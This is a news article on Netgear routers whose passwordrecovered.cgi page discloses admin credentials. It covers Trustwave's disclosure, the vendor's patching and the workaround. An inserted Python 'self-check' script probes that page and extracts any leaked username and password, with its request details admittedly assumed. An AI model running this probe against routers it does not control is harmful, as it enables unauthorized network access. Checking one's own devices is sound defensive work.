Hundreds of thousands, and potentially more than one million, Netgear routers are susceptible to a pair of vulnerabilities that can lead to password disclosure.
Researchers said that while anyone who has physical access to a router can exploit the vulnerabilities locally, the real threat is that the flaw can also be exploited remotely.
According to Simon Kenin, a security researcher with Trustwave’s Spiderlabs team, who discovered the flaw and disclosed it Monday, the vulnerabilities can be remotely exploited if the router’s remote management option is enabled.
While Netgear claims remote management is turned off on routers by default, Kenin said there are “hundreds of thousands, if not over a million” devices left remotely accessible.
Kenin claims that all he had to do was send a simple request to the router’s web management server to retrieve the router’s admin password. After determining a number that corresponds to a password recovery token, he found he could pair it with a call to the router’s passwordrecovered.cgi script. Kenin says he made the discovery while trying two exploits disclosed in 2014 against some Netgear routers he had lying around.
It wasn’t until after Kenin pieced together a Python script designed to diagnose the scope of the issue that he determined he could still retrieve the router’s credentials even if he didn’t send the correct password recovery token.
“After a few trials and errors trying to reproduce the issue, I found that the very first call to passwordrecovered.cgi will give out the credentials no matter what parameter you send. This is a totally new bug that I haven’t seen anywhere else. When I tested both bugs on different NETGEAR models, I found that my second bug works on a much wider range of models,” Kenin wrote Monday.
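The check described above can be scripted in a few lines. The following is an added example, not Trustwave’s or NETGEAR’s code, written as a self-check to run against a router you own. It assumes the management interface is reachable at the URL you pass in (i.e. remote management is enabled), that the token travels in an `id` query parameter, and that a vulnerable firmware answers with an HTML table labelling the leaked values “Username” and “Password”; the parameter name and the response markers are assumptions, not taken from the article, and the sample responses are constructed for offline use. Because the bug Kenin describes only fires on the first call, the script probes once with a deliberately random token: a credential leak on that call is conclusive, but a clean answer is not proof the device is safe.

```python
"""Self-check for the passwordrecovered.cgi credential leak (added example)."""
import re
import secrets
import sys
import urllib.error
import urllib.request

# Assumed HTML markers (not quoted from the advisory): a cell whose label ends
# in "Username"/"Password" followed by a cell holding the leaked value.
USERNAME_RE = re.compile(r"Username\s*</t[dh]>\s*<td[^>]*>\s*([^<]+?)\s*</td>", re.I)
PASSWORD_RE = re.compile(r"Password\s*</t[dh]>\s*<td[^>]*>\s*([^<]+?)\s*</td>", re.I)

# Constructed sample responses for offline testing (not captured from a device).
LEAKY_BODY = """<html><body><table>
<tr><td>Router Admin Username</td><td>admin</td></tr>
<tr><td>Router Admin Password</td><td>s3cret!</td></tr>
</table></body></html>"""
SAFE_BODY = "<html><body>Invalid recovery token</body></html>"


def build_probe_url(base_url: str, token: str) -> str:
    """Build the 2014-style call; the 'id' parameter name is an assumption."""
    return f"{base_url.rstrip('/')}/passwordrecovered.cgi?id={token}"


def extract_credentials(body: str):
    """Return (username, password) if the page leaks them, else None."""
    user = USERNAME_RE.search(body)
    pwd = PASSWORD_RE.search(body)
    if user and pwd:
        return user.group(1), pwd.group(1)
    return None


def fetch(url: str, timeout: float = 5.0):
    """Plain HTTP GET returning (status, body); replaced by a stub in tests."""
    req = urllib.request.Request(url, headers={"User-Agent": "netgear-selfcheck"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")


def check_router(base_url: str, fetch_fn=fetch) -> dict:
    """Probe once with a random token that cannot be the real recovery token.

    Credentials in the answer mean the first-call bug is present. No
    credentials is NOT a clean bill of health: the first call may already
    have been consumed, and the token-based path may still work.
    """
    token = str(secrets.randbelow(10**9))
    try:
        status, body = fetch_fn(build_probe_url(base_url, token))
    except (urllib.error.URLError, OSError) as exc:
        return {"reachable": False, "leaked": False, "error": str(exc)}
    creds = extract_credentials(body) if status == 200 else None
    return {"reachable": True, "status": status,
            "leaked": creds is not None, "credentials": creds}


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.0.2.1:8080"
    result = check_router(target)
    if not result["reachable"]:
        print(f"{target}: unreachable ({result['error']})")
    elif result["leaked"]:
        print(f"{target}: VULNERABLE, credentials returned without a valid token")
    else:
        print(f"{target}: no leak on first probe (not conclusive)")
```

Run it as `python netgear_check.py http://<router>:<port>` from outside your LAN to confirm whether the management interface is exposed at all; if it is reachable, that alone is the condition Netgear’s workaround tells you to remove by disabling remote management.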
Kenin’s employer, Trustwave, divulged details around both vulnerabilities in a lengthy blog post Monday, putting the wraps on a nearly year-long odyssey with the vendor.
The firm first disclosed the vulnerability to Netgear in April 2016, initially listing 18 vulnerable models and then 25 in a subsequent advisory. After repeated requests for an update on a fix, Netgear finally obliged in July and provided firmware updates for only a fraction of the affected routers.
It wasn’t until this weekend that Netgear acknowledged the issues again, posting an updated version of the article on its support page, instructing users to find and download the appropriate firmware fixes. The most recent version of the advisory claims there are 31 vulnerable models, 18 of which are patched.
For devices with no fixed firmware available, the company is encouraging users to apply a workaround. According to Netgear, users of 12 models should manually enable password recovery and disable remote management on their devices.
“The potential for password exposure remains if you do not complete both steps. NETGEAR is not responsible for any consequences that could have been avoided by following the recommendations in this notification,” the company writes.
It’s the first critical vulnerability to affect Netgear routers this year but the second in the last two months. In December, it was discovered that a handful of the company’s Nighthawk line of routers were vulnerable to a flaw that could have given an attacker root access on the device and allowed them to execute code remotely. The company was quick to release beta firmware updates to address the vulnerability but simultaneously confirmed that more routers than originally reported were vulnerable.
When reached Wednesday, a Netgear spokesperson said it was aware of the vulnerability and that it was appreciative of the research Trustwave carried out.
“NETGEAR does appreciate and value having security concerns brought to our attention. We constantly monitor for both known and unknown threats. Being pro-active rather than re-active to emerging security issues is fundamental for product support at NETGEAR. It is NETGEAR’s mission to be the innovative leader in connecting the world to the internet. To achieve this mission, we strive to earn and maintain the trust of those that use NETGEAR products for their connectivity.”
The router manufacturer is using the most recent incident to tout its fairly new bug bounty program. Netgear partnered with Bugcrowd at the beginning of the year and said it will dole out between $150 and $15,000 per bug.
Kenin and Trustwave learned of the company’s new bug bounty plan just prior to publishing their findings back in December, something that helped assuage any fears of the bugs not getting patched.
“We fully expect this move will not only smooth the relationship between third-party researchers and NETGEAR, but, in the end, will result in a more secure line of products and services.”
Kenin points out that in the wake of Mirai, having the admin password for a router can cause a lot of damage. In addition to giving an attacker access to the network, it lets them cherry-pick any connected devices that may be using the same admin password.
“As many people reuse their password, having the admin password of the router gives us an initial foothold on the network. We can see all the devices connected to the network and try to access them with that same admin password,” Kenin wrote Monday.
“With malware such as the Mirai botnet being out there, it is also possible that some of the vulnerable routers could be infected and ultimately used as bots as well. If running a bot is not possible, the DNS can be easily changed to a rogue one, as described by Proofpoint, to further infect machines on the network,” he added.
Kafeine, a researcher with Proofpoint, warned last month that attackers were using the DNSChanger exploit kit in man-in-the-middle attacks and to change the DNS records for routers.